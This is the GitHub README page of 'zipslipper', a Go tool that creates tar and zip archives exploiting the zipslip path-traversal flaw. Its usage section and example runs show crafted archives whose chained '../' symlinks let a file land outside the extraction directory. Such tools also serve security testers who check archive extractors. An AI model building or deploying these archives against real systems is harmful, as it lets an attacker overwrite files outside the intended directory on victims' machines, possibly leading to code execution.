Skip to content

Create tar/zip archives that try to exploit zipslip vulnerability.

Notifications You must be signed in to change notification settings

NodyHub/zipslipper

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

zipslipper

golangci-lint Create tar/zip archives that try to exploit zipslip vulnerability.

Usage

Basic usage on cli:

% zipslipper -h
Usage: zipslipper <input> <relative-path> <output-file> [flags]

A utility to build tar/zip archives that performs a zipslip attack.

Arguments:
  <input>            Input file.
  <relative-path>    Relative extraction path.
  <output-file>      Output file.

Flags:
  -h, --help                  Show context-sensitive help.
  -t, --archive-type="zip"    Archive type. (tar, zip)
  -v, --verbose               Verbose logging.
  -V, --version               Print release version information.

Usage example

Zip

(main[2]) ~/git/zipslipper% zipslipper go.mod ../../foo/bar/go.mod test.zip
(main[2]) ~/git/zipslipper% unzip -l test.zip
Archive:  test.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  09-20-2024 11:01   sub/
        3  09-20-2024 11:01   sub/root
        3  09-20-2024 11:01   sub/root/outside
        3  09-20-2024 11:01   sub/root/outside/0
        3  09-20-2024 11:01   sub/root/outside/0/1
        0  09-20-2024 11:01   sub/root/outside/0/1/foo/
        0  09-20-2024 11:01   sub/root/outside/0/1/foo/bar/
      103  09-20-2024 08:39   sub/root/outside/0/1/foo/bar/go.mod
---------                     -------
      115                     8 files

Tar

(main[2]) ~/git/zipslipper% zipslipper -t tar go.mod ../../foo/bar/go.mod test.tar
(main[2]) ~/git/zipslipper% tar ztvf test.tar
drwxr-xr-x  0 0      0           0 20 Sep 11:01 sub/
lrwxr-xr-x  0 0      0           0 20 Sep 11:01 sub/root -> ../
lrwxr-xr-x  0 0      0           0 20 Sep 11:01 sub/root/outside -> ../
lrwxr-xr-x  0 0      0           0 20 Sep 11:01 sub/root/outside/0 -> ../
lrwxr-xr-x  0 0      0           0 20 Sep 11:01 sub/root/outside/0/1 -> ../
drwxr-xr-x  0 0      0           0 20 Sep 11:01 sub/root/outside/0/1/foo/
drwxr-xr-x  0 0      0           0 20 Sep 11:01 sub/root/outside/0/1/foo/bar/
-rw-r--r--  0 jan    staff     103 20 Sep 08:39 sub/root/outside/0/1/foo/bar/go.mod

Install

You can use this library on the command line with the zipslipper command.

Pre-build release

Download a pre-build release for your system architecture from the release page.

Build via golang toolchain

go install github.com/NodyHub/zipslipper@latest

Manual build and installation

git clone [email protected]:NodyHub/zipslipper.git
cd zipslipper
make
make install

About

Create tar/zip archives that try to exploit zipslip vulnerability.

Resources

Stars

Watchers

Forks